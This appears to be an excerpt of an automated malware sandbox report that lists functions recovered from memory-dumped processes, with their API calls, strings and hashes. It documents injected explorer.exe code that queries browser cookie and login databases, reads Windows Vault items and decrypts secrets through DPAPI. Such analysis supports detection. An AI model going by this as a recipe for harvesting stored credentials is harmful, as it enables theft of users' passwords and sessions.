Instruction ID: 21878226d7fd0a21662a5e096697a7a178302cec00be2da7b3858d9076f961f5
Opcode Fuzzy Hash: c16b9007777c5fbaa3f53cde1809afd9184394dfa0c7ae21d454d4480f8148c1
Instruction Fuzzy Hash: 48213134608B488FCB54EB28D49866AB7F1FB99311B000A6EE49AC7264DB70E845DB81

Function 03443CD0 Relevance: 3.0, APIs: 2, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnumWindows.USER32 ref: 03443CEC
SleepEx.KERNEL32 ref: 03443CF7

Memory Dump Source

Source File: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Offset: 03441000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3441000_explorer.jbxd

Yara matches

Similarity

API ID: EnumSleepWindows
String ID:
API String ID: 498413330-0
Opcode ID: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
Instruction ID: c6f934a4a6e984e28e85a4ddf0a2c148637f639aaf71550a5984d1df9672677e
Opcode Fuzzy Hash: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
Instruction Fuzzy Hash: C1E04F306046098FFB28EFA4C4D8BB136A1EB18206F18017BDC0EDD285CB764955C724

Function 03443F7C Relevance: 2.0, APIs: 1, Instructions: 455
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Offset: 03441000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3441000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03da1ff889cf56ce5b15326bb5d87766f4294a11689bde974b35e737c0aadbcd
Instruction ID: 780c50c8444a718a785d90643d6b78df299e7c2577df40f9b7077719bf020fa2
Opcode Fuzzy Hash: 03da1ff889cf56ce5b15326bb5d87766f4294a11689bde974b35e737c0aadbcd
Instruction Fuzzy Hash: 63D18F30718B098FEB54EF6994457AEB7E2FB98701F10453EE44AD7341EE74E8028B86

Function 03444578 Relevance: 1.6, APIs: 1, Instructions: 119processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32 ref: 0344465C

Memory Dump Source

Source File: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Offset: 03441000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3441000_explorer.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: c6ea0675358742ce16f6cf21072778e4d3517b6488bd88ff55d4cd9cd9108430
Instruction ID: 385e3ae0e44210943c66b66e2d465640ce19d6a597420aa25231e6e44e560322
Opcode Fuzzy Hash: c6ea0675358742ce16f6cf21072778e4d3517b6488bd88ff55d4cd9cd9108430
Instruction Fuzzy Hash: CF316D30708F484FDB94EF69908875AB6E2FB98311F104A6FA44EDB345DF74D8458B85

Function 03444C90 Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

GetVolumeInformationA.KERNEL32 ref: 03444CFD

Memory Dump Source

Source File: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Offset: 03441000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3441000_explorer.jbxd

Yara matches

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: 1d0cb5fe9283983f3568e12a9bb75b7ec9ed7c5609916c5b8e7118791da650f8
Instruction ID: a73196bbcc993117c734c59621bbd709bc66f62f4ebe102e499543991c8b6fe0
Opcode Fuzzy Hash: 1d0cb5fe9283983f3568e12a9bb75b7ec9ed7c5609916c5b8e7118791da650f8
Instruction Fuzzy Hash: 40316730618B4C8FDB64EF68D448BAA77E1FBA8311F10466F984EDB264DE30D9458B81

Function 03441980 Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 034419D0: RtlCreateHeap.NTDLL ref: 03441AE7

SleepEx.KERNEL32(?,?,?,?,?,?,?,03441973), ref: 034419A0

Memory Dump Source

Source File: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Offset: 03441000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3441000_explorer.jbxd

Yara matches

Similarity

API ID: CreateHeapSleep
String ID:
API String ID: 221814145-0
Opcode ID: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
Instruction ID: 269ef93fb9452de5007bd924a25b24036bccb1b67fe5d58d108b4df4213cbed0
Opcode Fuzzy Hash: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
Instruction Fuzzy Hash: 61E04814714B085FFB94F77A948473D61A1DBC8150F54157FA51FCE285D934C8C5C716

Analysis Process: djvbaaePID: 3052, Parent PID: 1044COMMON

Executed Functions

Function 00AE0C20 Relevance: 1.4, Strings: 1, Instructions: 141COMMON

Download Yara Rule

Strings

tP^q, xrefs: 00AE0CE7

Memory Dump Source

Source File: 0000000F.00000002.2402685785.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_ae0000_djvbaae.jbxd

Similarity

API ID:
String ID: tP^q
API String ID: 0-2862610199
Opcode ID: 7bd0378bf95ac04c53e495b4a2244f35a6ba345b8b68ac115d5982420c4ee976
Instruction ID: a71876d5aad16c59ef1b68e11fef6479daada0749b370f8216a58f663ade3618
Opcode Fuzzy Hash: 7bd0378bf95ac04c53e495b4a2244f35a6ba345b8b68ac115d5982420c4ee976
Instruction Fuzzy Hash: DF410E317412508FCB09AB78C85886D7BB2EF8975632504AEE406CF376DE75CC82CB91

Function 00AE0D58 Relevance: 1.3, Strings: 1, Instructions: 30COMMON

Download Yara Rule

Strings

8bq, xrefs: 00AE0D75

Memory Dump Source

Source File: 0000000F.00000002.2402685785.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_ae0000_djvbaae.jbxd

Similarity

API ID:
String ID: 8bq
API String ID: 0-187764589
Opcode ID: bed90f9a6706141b056933f57a02a68e1cf82370dadd2dfecb9b77dafe31b93c
Instruction ID: 0f5206f73f593ef65b586671faec691f82f962ce48039eba1b681d890ce8f27a
Opcode Fuzzy Hash: bed90f9a6706141b056933f57a02a68e1cf82370dadd2dfecb9b77dafe31b93c
Instruction Fuzzy Hash: 5FF027742012405FC702E7B9E550EA9BBF1DF89308B0440ADE085CF3BADAA59C8BDB80

Function 00AE0D68 Relevance: 1.3, Strings: 1, Instructions: 24COMMON

Download Yara Rule

Strings

8bq, xrefs: 00AE0D75

Memory Dump Source

Source File: 0000000F.00000002.2402685785.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_ae0000_djvbaae.jbxd

Similarity

API ID:
String ID: 8bq
API String ID: 0-187764589
Opcode ID: 656e7372d4808c4c5d7ea5b8592caa9c3e11ad9ac04be7c0b803d216e7407e21
Instruction ID: 2408102c0d2838d1ee02f2301670e8db5c78df46adacc48efcdc3e2922523996
Opcode Fuzzy Hash: 656e7372d4808c4c5d7ea5b8592caa9c3e11ad9ac04be7c0b803d216e7407e21
Instruction Fuzzy Hash: 5AE0D8342005048FC601F7EAE540F5AB7E5EF88309B004468E1098B378DF72AC4BABC0

Function 00AE0848 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2402685785.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_ae0000_djvbaae.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8887493750647230e352bdfae37c3b96fee745e05477239d1527d1d111cdf419
Instruction ID: 65f3a312b2b14591a0907c23eb7bb6e49a0b02d7d05efa63bb3099abbe6bc4d2
Opcode Fuzzy Hash: 8887493750647230e352bdfae37c3b96fee745e05477239d1527d1d111cdf419
Instruction Fuzzy Hash: 7D811F31A002048FDB11EBB9D954B9EB7F2EF88304F14856AD40997365EF75AD8BCB81

Function 00AE08A8 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2402685785.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_ae0000_djvbaae.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8721bef41a9b34aaea4ef971dbbb9942703bf32cf0912f3522b9466be6f38ec
Instruction ID: 26067bfcef13da0eceb8eba1ed621606d4fed62d0b40423590bef90acc5f8c37
Opcode Fuzzy Hash: b8721bef41a9b34aaea4ef971dbbb9942703bf32cf0912f3522b9466be6f38ec
Instruction Fuzzy Hash: A841F030E002059FDB15EBB9C558A9EB7F6AFC8704F10853AD405E3365DF759C868B81

Function 00AE092D Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2402685785.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_ae0000_djvbaae.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5b5561e028ffd053e7665a1b4b69ff04c05eeb3cdebd4546f1c93f657d962a3
Instruction ID: 298e59f55ffe6f0000dd35ad651b945e1782c67861baf9b78335db6c31d644e2
Opcode Fuzzy Hash: c5b5561e028ffd053e7665a1b4b69ff04c05eeb3cdebd4546f1c93f657d962a3
Instruction Fuzzy Hash: A6217F30B002058FEF14ABB9C65875DB7E2AF88709F104479D809D7365DF75DC868B91

Function 00AE0E18 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2402685785.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_ae0000_djvbaae.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37c6ada6cefcd1391b66ff2d318f7dcbf5f704fdcacf596a496596359608077d
Instruction ID: 16daec5f7de82fa9cfc682b36bf03d1f428e23b65448d5097b5ec914e339f1af
Opcode Fuzzy Hash: 37c6ada6cefcd1391b66ff2d318f7dcbf5f704fdcacf596a496596359608077d
Instruction Fuzzy Hash: AEF09679644780AFCB02ABB5F884DA47FB1EF0A32571501D6E448CB336C762DC9ADB41

Function 00AE0D23 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2402685785.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_ae0000_djvbaae.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a311e82d8a005e78040f032c557c6f1237aca64db266a1136252ed4c4416e0e7
Instruction ID: f0db55cd9bfcbe845742c274412db6f2647771cc036a25936e602af20c1f53a2
Opcode Fuzzy Hash: a311e82d8a005e78040f032c557c6f1237aca64db266a1136252ed4c4416e0e7
Instruction Fuzzy Hash: D5E0EC755083C0AFCB129F74E4988A47F71AF1B22531904D9D8858B337C622989ADB11

Analysis Process: explorer.exePID: 4928, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	3.5%
Dynamic/Decrypted Code Coverage:	50.8%
Signature Coverage:	21.6%
Total number of Nodes:	783
Total number of Limit Nodes:	72

Executed Functions

Function 02D63717 Relevance: 45.9, APIs: 19, Strings: 7, Instructions: 401
stringfileencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02D61B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02D62893,00000000,00000000,00000000,?), ref: 02D61B82
Part of subcall function 02D61B6A: CloseHandle.KERNELBASE(00000000), ref: 02D61B8F

GetTempPathW.KERNEL32(00000104,00000000), ref: 02D63778
GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 02D63782
DeleteFileW.KERNELBASE(00000000), ref: 02D63789
CopyFileW.KERNELBASE(?,00000000,00000000), ref: 02D63794
RtlCompareMemory.NTDLL(00000000,?,00000003), ref: 02D6383B
RtlZeroMemory.NTDLL(?,00000040), ref: 02D63870
lstrlen.KERNEL32(?,?,?,?,?), ref: 02D6398B
lstrlen.KERNEL32(00000000), ref: 02D6399A
wsprintfA.USER32 ref: 02D639F1
lstrlen.KERNEL32(00000000,?,?), ref: 02D639FD
lstrcat.KERNEL32(00000000,?), ref: 02D63A21
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 02D63A49
lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 02D63B13
lstrlen.KERNEL32(00000000), ref: 02D63B22
wsprintfA.USER32 ref: 02D63B79
lstrlen.KERNEL32(00000000), ref: 02D63B85
lstrcat.KERNEL32(00000000,?), ref: 02D63BA9
lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 02D63BDA
DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 02D63C16

Strings

FALSE, xrefs: 02D639BC, 02D63B3C
SELECT host_key,path,is_secure,name,encrypted_value FROM cookies, xrefs: 02D637C3
v1, xrefs: 02D63821
COOKIES, xrefs: 02D63BE8, 02D63BED, 02D63BF6
TRUE, xrefs: 02D639C9, 02D63B51
%sTRUE%s%s%s%s%s, xrefs: 02D639EB, 02D63B73
0, xrefs: 02D63828

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: lstrlen$File$DeleteMemoryTemplstrcatwsprintf$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
String ID: %sTRUE%s%s%s%s%s$0$COOKIES$FALSE$SELECT host_key,path,is_secure,name,encrypted_value FROM cookies$TRUE$v1
API String ID: 584740257-404540950
Opcode ID: f77b9fefe34fca29670dce09ea2ae3f1c2f06e863178c85e474fb6fdf9d3b032
Instruction ID: 403453e96668c4baebfa82cc84e5de04f4a7e0ef89f64967b5224452a7d228b2
Opcode Fuzzy Hash: f77b9fefe34fca29670dce09ea2ae3f1c2f06e863178c85e474fb6fdf9d3b032
Instruction Fuzzy Hash: A3E15871608341AFD755DF24C898A3BBBEAEF85B44F04486DF98596390DB35CC05CBA2

Function 02D62198 Relevance: 33.5, APIs: 12, Strings: 7, Instructions: 242
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlZeroMemory.NTDLL(?,00000114), ref: 02D621AF
GetVersionExW.KERNEL32(?), ref: 02D621BE
LoadLibraryW.KERNELBASE(vaultcli.dll), ref: 02D621E8
GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 02D6220A
GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 02D62214
GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 02D62220
GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 02D6222A
GetProcAddress.KERNEL32(00000000,VaultFree), ref: 02D62236
RtlCompareMemory.NTDLL(?,02DC1110,00000010), ref: 02D622E8
RtlCompareMemory.NTDLL(?,02DC1110,00000010), ref: 02D6236C

Part of subcall function 02D61953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02D62F0C), ref: 02D61973
Part of subcall function 02D61953: lstrlenW.KERNEL32(02DB6564,?,?,02D62F0C), ref: 02D61978
Part of subcall function 02D61953: lstrcatW.KERNEL32(00000000,?,?,?,02D62F0C), ref: 02D61990
Part of subcall function 02D61953: lstrcatW.KERNEL32(00000000,02DB6564,?,?,02D62F0C), ref: 02D61994

StrStrIW.SHLWAPI(?,Internet Explorer), ref: 02D623FE
FreeLibrary.KERNELBASE(00000000), ref: 02D62493

Strings

VaultCloseVault, xrefs: 02D6220C
VaultOpenVault, xrefs: 02D62204
VaultEnumerateItems, xrefs: 02D62216
Internet Explorer, xrefs: 02D623F8
VaultFree, xrefs: 02D6222C
VaultGetItem, xrefs: 02D62222
vaultcli.dll, xrefs: 02D621E3

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: AddressProc$Memory$CompareLibrarylstrcatlstrlen$FreeLoadVersionZero
String ID: Internet Explorer$VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
API String ID: 2583887280-2831467701
Opcode ID: 627f2a9d7353eafd653dfae6b6b6f4653cc9ca271a7c28b7937151e3fab23a01
Instruction ID: 28601e89ff5e160249999d1868901ab2242314df0e2a1b100da75b3ed589cf56
Opcode Fuzzy Hash: 627f2a9d7353eafd653dfae6b6b6f4653cc9ca271a7c28b7937151e3fab23a01
Instruction Fuzzy Hash: 24915B71A083459FD714DF65C858A2BBBEAEF98704F00482EF99597350EB70ED05CB92

Function 02D63098 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 248
fileencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02D61B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02D62893,00000000,00000000,00000000,?), ref: 02D61B82
Part of subcall function 02D61B6A: CloseHandle.KERNELBASE(00000000), ref: 02D61B8F

GetTempPathW.KERNEL32(00000104,00000000), ref: 02D630F9
GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 02D63103
DeleteFileW.KERNELBASE(00000000), ref: 02D6310A
CopyFileW.KERNELBASE(?,00000000,00000000), ref: 02D63115
RtlCompareMemory.NTDLL(00000000,00000000,00000003), ref: 02D631A4
RtlZeroMemory.NTDLL(?,00000040), ref: 02D631D7
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 02D632DF
DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 02D6339C

Strings

@, xrefs: 02D631F1
v1, xrefs: 02D6318A
SELECT origin_url,username_value,password_value FROM logins, xrefs: 02D63136
0, xrefs: 02D63191

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: File$DeleteMemoryTemp$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
String ID: 0$@$SELECT origin_url,username_value,password_value FROM logins$v1
API String ID: 2757140130-4052020286
Opcode ID: 33bb10fc5dbfcd71a24e05d05cdcd00a564fa351ec4e1d5804cf44f807a42649
Instruction ID: d45a50cfaa00e529fbf22ffdb5cad3e59ec538399ba06cffd081b60d73b0ef04
Opcode Fuzzy Hash: 33bb10fc5dbfcd71a24e05d05cdcd00a564fa351ec4e1d5804cf44f807a42649
Instruction Fuzzy Hash: 25917871608341ABD7519F65C848A3FBBEAEFC9B48F04492DF58596390DB35DC04CB62

Function 02D63ED9 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 82
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02D61000: GetProcessHeap.KERNEL32(00000008,?,02D611C7,?,?,00000001,00000000,?), ref: 02D61003
Part of subcall function 02D61000: RtlAllocateHeap.NTDLL(00000000), ref: 02D6100A

PathCombineW.SHLWAPI(00000000,00000000,*.*,?,00000000), ref: 02D63F0A
FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 02D63F16
lstrcmpiW.KERNEL32(?,02DB62CC), ref: 02D63F38
lstrcmpiW.KERNEL32(?,02DB62D0), ref: 02D63F4C
PathCombineW.SHLWAPI(00000000,00000000,?), ref: 02D63F69
lstrcmpiW.KERNEL32(?,Local State), ref: 02D63F7E
PathCombineW.SHLWAPI(00000000,00000000,?), ref: 02D63F9B
FindNextFileW.KERNELBASE(00000000,00000010), ref: 02D63FB5
FindClose.KERNELBASE(00000000), ref: 02D63FC4

Strings

Local State, xrefs: 02D63F78
*.*, xrefs: 02D63F01

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: CombineFindPathlstrcmpi$FileHeap$AllocateCloseFirstNextProcess
String ID: *.*$Local State
API String ID: 3923353463-3324723383
Opcode ID: 0c1cf954b53474b8d713db752281e74a727dbe35c159ff0931f895c41361b2cb
Instruction ID: 276a63fbb1bb60b3991b2282dba7dd4371fad9a99700f9e8d615ddaad77d0e4d
Opcode Fuzzy Hash: 0c1cf954b53474b8d713db752281e74a727dbe35c159ff0931f895c41361b2cb
Instruction Fuzzy Hash: 9821CF30644245EFEB91AA709C2CA7B77BDDF81A45F140929F802C2381DB78CC188AB1

Function 02D62B15 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 102
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02D61953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02D62F0C), ref: 02D61973
Part of subcall function 02D61953: lstrlenW.KERNEL32(02DB6564,?,?,02D62F0C), ref: 02D61978
Part of subcall function 02D61953: lstrcatW.KERNEL32(00000000,?,?,?,02D62F0C), ref: 02D61990
Part of subcall function 02D61953: lstrcatW.KERNEL32(00000000,02DB6564,?,?,02D62F0C), ref: 02D61994

FindFirstFileW.KERNELBASE(00000000,?,00000000,00000000,?,00000000), ref: 02D62B3D
lstrcmpiW.KERNEL32(?,02DB62CC), ref: 02D62B63
lstrcmpiW.KERNEL32(?,02DB62D0), ref: 02D62B7B

Part of subcall function 02D619B4: lstrlenW.KERNEL32(00000000,00000000,00000000,02D62CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 02D619C4

StrStrIW.SHLWAPI(00000000,logins.json), ref: 02D62BE7
StrStrIW.SHLWAPI(00000000,cookies.sqlite), ref: 02D62C16
FindNextFileW.KERNELBASE(00000000,00000010), ref: 02D62C43
FindClose.KERNELBASE(00000000), ref: 02D62C52

Strings

\*.*, xrefs: 02D62B15
cookies.sqlite, xrefs: 02D62C10
logins.json, xrefs: 02D62BE1

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: Findlstrlen$Filelstrcatlstrcmpi$CloseFirstNext
String ID: \*.*$cookies.sqlite$logins.json
API String ID: 1108783765-3717368146
Opcode ID: 6469887e40104912b487a07fa614a79c0a2696fcd4308f170e55f327ac27dc44
Instruction ID: 8993d534761e34b8241694e21460af8defcda05b038a8953d01f69f283529fec
Opcode Fuzzy Hash: 6469887e40104912b487a07fa614a79c0a2696fcd4308f170e55f327ac27dc44
Instruction Fuzzy Hash: E531AF307043058B9B16AB7098ACA7F73DBEF84700F04492DED5A92384EB79CD059AA1

Function 02D61D4A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 109
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02D619B4: lstrlenW.KERNEL32(00000000,00000000,00000000,02D62CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 02D619C4

FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 02D61DA9
lstrcmpiW.KERNEL32(?,02DB62CC), ref: 02D61DCF
lstrcmpiW.KERNEL32(?,02DB62D0), ref: 02D61DE7
lstrcmpiW.KERNEL32(?,?), ref: 02D61E62

Part of subcall function 02D61CF7: lstrlenW.KERNEL32(00000000,00000000,00000000,02D62C27), ref: 02D61D02
Part of subcall function 02D61CF7: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 02D61D0D

FindNextFileW.KERNELBASE(00000000,00000010), ref: 02D61E94
FindClose.KERNELBASE(00000000), ref: 02D61EA3

Part of subcall function 02D61953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02D62F0C), ref: 02D61973
Part of subcall function 02D61953: lstrlenW.KERNEL32(02DB6564,?,?,02D62F0C), ref: 02D61978
Part of subcall function 02D61953: lstrcatW.KERNEL32(00000000,?,?,?,02D62F0C), ref: 02D61990
Part of subcall function 02D61953: lstrcatW.KERNEL32(00000000,02DB6564,?,?,02D62F0C), ref: 02D61994

Strings

\*.*, xrefs: 02D61D79
*.*, xrefs: 02D61D8B

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: lstrlen$Findlstrcmpi$Filelstrcat$CloseComputeCrc32FirstNext
String ID: *.*$\*.*
API String ID: 232625764-1692270452
Opcode ID: 7fc92168462c9b9e1501e8c4bbb8deefc9f58925015fd7563b07f6cf25a0a149
Instruction ID: 9c2e5d3a2198d9ef3f095d4951b0bba1597ffc3415e87faeec0862eba802d693
Opcode Fuzzy Hash: 7fc92168462c9b9e1501e8c4bbb8deefc9f58925015fd7563b07f6cf25a0a149
Instruction Fuzzy Hash: F93161317043419BDB11EB75889CBBF77EA9FC4240F144929E95E82345EB75CC19CAA2

Function 02D63E04 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 75
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02D61B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02D62893,00000000,00000000,00000000,?), ref: 02D61B82
Part of subcall function 02D61B6A: CloseHandle.KERNELBASE(00000000), ref: 02D61B8F

Part of subcall function 02D61C31: CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,02D63E1E,00000000,?,02D63FA8), ref: 02D61C46
Part of subcall function 02D61C31: GetFileSize.KERNEL32(00000000,00000000,00000000,?,02D63FA8), ref: 02D61C56
Part of subcall function 02D61C31: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,02D63FA8), ref: 02D61C76
Part of subcall function 02D61C31: CloseHandle.KERNEL32(00000000,?,02D63FA8), ref: 02D61C91

Part of subcall function 02D62FB1: StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,02D63E30,00000000,00000000,?,02D63FA8), ref: 02D62FC1
Part of subcall function 02D62FB1: lstrlen.KERNEL32("encrypted_key":",?,02D63FA8), ref: 02D62FCE
Part of subcall function 02D62FB1: StrStrIA.SHLWAPI("encrypted_key":",02DB692C,?,02D63FA8), ref: 02D62FDD

Part of subcall function 02D6123B: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,02D63E4B,00000000), ref: 02D6124A
Part of subcall function 02D6123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02D61268
Part of subcall function 02D6123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02D61295

RtlCompareMemory.NTDLL(00000000,IDPAP,00000005), ref: 02D63E74
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 02D63E9E

Strings

IDPAP, xrefs: 02D63E6E, 02D63E72
DPAP, xrefs: 02D63E52
DPAP, xrefs: 02D63E5A
, xrefs: 02D63EA8

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: File$Crypt$BinaryCloseCreateHandleStringlstrlen$CompareDataMemoryReadSizeUnprotect
String ID: $DPAP$DPAP$IDPAP
API String ID: 3076719866-957854035
Opcode ID: 8a946909a5da43e803dbd0b37eda39d1d798fce1f2aead54768fbe73b4937b60
Instruction ID: 757af4fa4191cc7b9d1e80bb1df2194897689acf4b02c43c8fb619480fe2d280
Opcode Fuzzy Hash: 8a946909a5da43e803dbd0b37eda39d1d798fce1f2aead54768fbe73b4937b60
Instruction Fuzzy Hash: F821AA726043465BD711EAA88984A7FB3DDAB94B04F44066DE845D7341DB74CD058BB2

Function 02DC9247 Relevance: 6.3, APIs: 4, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002DC7000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2dc7000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23d0a01393b7bfe63dc369c5b6e3a0f8feb8c095d53cae4f5d79b5de4e8245c8
Instruction ID: b2c9c0e94e1c36a62ee18b96b05d8546a30162e0967eacbcae31e73f318db15d
